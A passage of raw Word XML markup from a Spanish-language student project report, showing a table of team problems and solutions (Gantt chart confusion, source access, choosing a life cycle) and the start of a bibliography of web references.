            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11470" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00A5499E" w:rsidRPr="00DA02C8" w:rsidRDefault="0042181B" w:rsidP="00DA02C8">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0042181B">
              <w:t>Confusión sobre la información que se colocaría en diferentes tareas d</w:t>
            </w:r>
            <w:r>
              <w:t>e la actividad como lo fue en el</w:t>
            </w:r>
            <w:r w:rsidRPr="0042181B">
              <w:t xml:space="preserve"> diagrama de Gantt o la matriz de responsabilidades, se solucionó preguntando a mis compañeros de equipo y a mis compañeros de clase.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidTr="005702EF">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="3722"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11470" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="000A48BE" w:rsidRPr="000A48BE" w:rsidRDefault="000A48BE" w:rsidP="000A48BE">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="000A48BE">
              <w:t xml:space="preserve">No se tuvo acceso a fuentes de la biblioteca digital. Solución se investigó en fuentes </w:t>
            </w:r>
            <w:r w:rsidR="009E53AE">
              <w:t>con</w:t>
            </w:r>
            <w:r w:rsidRPr="000A48BE">
              <w:t>fiables en internet.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009E53AE" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidTr="005702EF">
        <w:trPr>
          <w:trHeight w:val="3722"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A5499E" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11470" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="008D2AC4" w:rsidRPr="008D2AC4" w:rsidRDefault="008D2AC4" w:rsidP="008D2AC4">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="008D2AC4">
              <w:t xml:space="preserve">Algunas páginas mostraban información completa. Además no todas son </w:t>
            </w:r>
            <w:r w:rsidR="009E53AE">
              <w:t>con</w:t>
            </w:r>
            <w:r w:rsidRPr="008D2AC4">
              <w:t xml:space="preserve">fiables. Solución  buscar en diferentes sitios web al igual de tener paciencia. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="008D2AC4" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00911B74" w:rsidRPr="009B0334" w:rsidTr="005702EF">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="3722"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00911B74" w:rsidRDefault="00911B74" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00911B74" w:rsidRDefault="00911B74" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00911B74" w:rsidRDefault="00911B74" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11470" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00911B74" w:rsidRDefault="00911B74" w:rsidP="00911B74">
            <w:pPr>
              <w:ind w:left="163" w:firstLine="0"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00911B74" w:rsidRPr="00911B74" w:rsidRDefault="00911B74" w:rsidP="00911B74">
            <w:pPr>
              <w:ind w:left="163" w:firstLine="0"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00911B74">
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="00911B74">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Problemática:</w:t>
            </w:r>
            <w:r w:rsidRPr="00911B74">
              <w:t xml:space="preserve"> entender algunos puntos a realizar en la actividad. Al realizar la actividad, qué problemáticas se presentaron y cuáles soluciones propuso cada integrante. Extensión en un inicio no se comprendía si los ejemplos en cuanto al apartado del proyecto eran en base al proyecto integrador o ejemplos comunes. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00911B74" w:rsidRPr="00911B74" w:rsidRDefault="00911B74" w:rsidP="00911B74">
            <w:pPr>
              <w:ind w:left="163" w:firstLine="0"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r w:rsidRPr="00911B74">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Solución:</w:t>
            </w:r>
            <w:r w:rsidRPr="00911B74">
              <w:t xml:space="preserve"> Plantear dicha problemática al profesor par</w:t>
            </w:r>
            <w:r w:rsidR="009E53AE">
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00911B74">
              <w:t xml:space="preserve"> aclaraciones</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00911B74" w:rsidRPr="008D2AC4" w:rsidRDefault="00911B74" w:rsidP="008D2AC4">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00911B74" w:rsidRPr="009B0334" w:rsidTr="005702EF">
        <w:trPr>
          <w:trHeight w:val="3722"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00911B74" w:rsidRDefault="00911B74" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00911B74" w:rsidRDefault="00911B74" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00911B74" w:rsidRDefault="00911B74" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11470" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00911B74" w:rsidRDefault="00911B74" w:rsidP="008D2AC4">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00406EEF" w:rsidRPr="00406EEF" w:rsidRDefault="00406EEF" w:rsidP="00E75C54">
            <w:pPr>
              <w:ind w:left="709" w:firstLine="0"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00406EEF">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Problemática:</w:t>
            </w:r>
            <w:r w:rsidRPr="00406EEF">
              <w:t xml:space="preserve"> Elección del ciclo de vida adecuado para el proyecto integrador.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00406EEF" w:rsidRPr="00406EEF" w:rsidRDefault="00406EEF" w:rsidP="00E75C54">
            <w:pPr>
              <w:ind w:left="709" w:firstLine="0"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00406EEF">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Solución:</w:t>
            </w:r>
            <w:r w:rsidRPr="00406EEF">
              <w:t xml:space="preserve"> Investigar tres ciclos que sean aplicables al tipo de proyecto con el que contamos. </w:t>
            </w:r>
            <w:r w:rsidRPr="00406EEF">
              <w:br w:type="page"/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00406EEF" w:rsidRPr="008D2AC4" w:rsidRDefault="00406EEF" w:rsidP="008D2AC4">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E162E1" w:rsidRDefault="00E162E1" w:rsidP="00411995">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003830AC" w:rsidRDefault="00CD7200" w:rsidP="003830AC">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003830AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003830AC" w:rsidRDefault="003830AC" w:rsidP="003830AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A3694B" w:rsidRPr="003830AC" w:rsidRDefault="00A3694B" w:rsidP="003830AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A3694B" w:rsidRPr="003830AC" w:rsidSect="002D6D25">
          <w:headerReference w:type="default" r:id="rId108"/>
          <w:footerReference w:type="default" r:id="rId109"/>
          <w:pgSz w:w="15840" w:h="12240" w:orient="landscape"/>
          <w:pgMar w:top="1701" w:right="1417" w:bottom="1701" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00411995" w:rsidRDefault="00411995" w:rsidP="00411995">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc514520862"/>
      <w:r w:rsidRPr="00E162E1">
        <w:lastRenderedPageBreak/>
        <w:t>BIBLIOGRAFÍAS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00D27FEB" w:rsidRPr="006F4AA8" w:rsidRDefault="00D27FEB" w:rsidP="00D27FEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES" w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="-174812984"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00D168BF" w:rsidRDefault="00D168BF">
          <w:pPr>
            <w:pStyle w:val="Ttulo1"/>
          </w:pPr>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="00D168BF" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r w:rsidRPr="006F4AA8">
                <w:instrText>BIBLIOGRAPHY</w:instrText>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="009E53AE">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>AJDP Soft.</w:t>
              </w:r>
              <w:r w:rsidR="009E53AE">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (2018). Obtenido de http://www.ajpdsoft.com/modules.php?name=Encyclopedia&amp;op=content&amp;tid=820</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Alegsa, L. (14 de NOVIEMBRE de 2010). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>www.alegsa.com.ar</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de MP4: http://www.alegsa.com.ar/Dic/mp4.php</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Ángel, M. M. (04 de Agosto de 2014). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Welivesecurity.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Obtenido de https://www.welivesecurity.com/la-es/2014/08/04/vulnerabilidades-que-es-cvss-como-utilizarlo/</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Apache foundation.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (2018). Obtenido de https://apachefoundation.wikispaces.com/Apache+Tomcat</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Apowersoft. (12 de ENERO de 2016). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>www.apowersoft.es</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Formato MP4: https://www.apowersoft.es/que-es-el-formato-mp4.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Barcelona, U. d. (01 de Enero de 2016). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>¿Que es un diagrama de gantt?</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Recuperado el 16 de Mayo de 2018, de ¿Que es un diagrama de gantt?: https://www.obs-edu.com/int/blog-project-management/diagramas-de-gantt/que-es-un-diagrama-de-gantt-y-para-que-sirve</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Carlos, J. (26 de DICIEMBRE de 2010). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>psicologiayempresa.com</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Factores más usados en la evaluación de desempeño: https://psicologiayempresa.com/factores-mas-usados-en-la-evaluacion-de-desempeno.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
